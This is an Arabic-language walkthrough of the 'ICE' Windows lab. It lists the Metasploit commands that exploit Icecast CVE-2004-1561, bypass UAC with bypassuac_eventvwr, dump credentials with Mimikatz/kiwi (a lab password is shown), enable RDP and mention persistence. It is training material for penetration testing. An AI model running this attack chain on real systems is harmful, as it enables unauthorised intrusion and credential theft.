ICE هو تحدي Windows exploitation كلاسيكي مبني على استغلال ثغرة في Icecast Media Server — سيرفر بث صوتي قديم بيشتغل على port 8000.
الثغرة هي CVE-2004-1561 (Header Overwrite) وتُستغل بـ Metasploit مباشرة للحصول على Meterpreter shell.
بعد كده هتعمل Privilege Escalation بـ bypassuac_eventvwr، وتستخرج credentials بـ Mimikatz، وتفعّل الـ RDP للوصول الكامل.
أكمل اللاب واحصل على الـ Badge الرسمي — أضفه لملفك على LinkedIn
فحص كل الـ ports — هتلاقي Icecast على port 8000 + hostname الجهاز
nmap -sS -sC -p-port 8000استخدام exploit/windows/http/icecast_header في Metasploit — RHOSTS فقط مطلوب
CVE-2004-1561Meterpreter shellتشغيل post/multi/recon/local_exploit_suggester لاقتراح الـ PrivEsc exploits
bypassuac_eventvwrاستخدام exploit/windows/local/bypassuac_eventvwr مع SESSION المحددة
Admin Meterpreterالانتقال لـ process ثابت → load kiwi → creds_all لاستخراج كلمات المرور
Mimikatz/KiwiDark:Password1!تشغيل run post/windows/manage/enable_rdp للاتصال بـ Remote Desktop
RDP Access 🏆| الأمر | الوصف | المرحلة |
|---|---|---|
| nmap -sS -sC -p- <IP> -T4 | فحص كل الـ ports على Windows | Recon |
| use exploit/windows/http/icecast_header | اختيار Icecast exploit | Exploit |
| set RHOSTS <IP> → run | تشغيل الـ exploit | Exploit |
| run post/multi/recon/local_exploit_suggester | اقتراح PrivEsc exploits | PrivEsc |
| use exploit/windows/local/bypassuac_eventvwr | UAC Bypass للـ Admin | PrivEsc |
| migrate -N spoolsv.exe | الانتقال لـ process ثابت | Migration |
| load kiwi → creds_all | استخراج كل الـ credentials | Loot |
| run post/windows/manage/enable_rdp | تفعيل Remote Desktop | RDP |
| getprivs | عرض الـ privileges الحالية | Info |
Deploy machine · Connect VPN · read intro
nmap -sS -p- · Icecast port 8000 · hostname DARK-PC
msfconsole → icecast_header → RHOSTS → run → Meterpreter
local_exploit_suggester → bypassuac_eventvwr → getprivs
migrate → load kiwi → creds_all → Dark:Password1!
enable_rdp → dump hashes → persistence options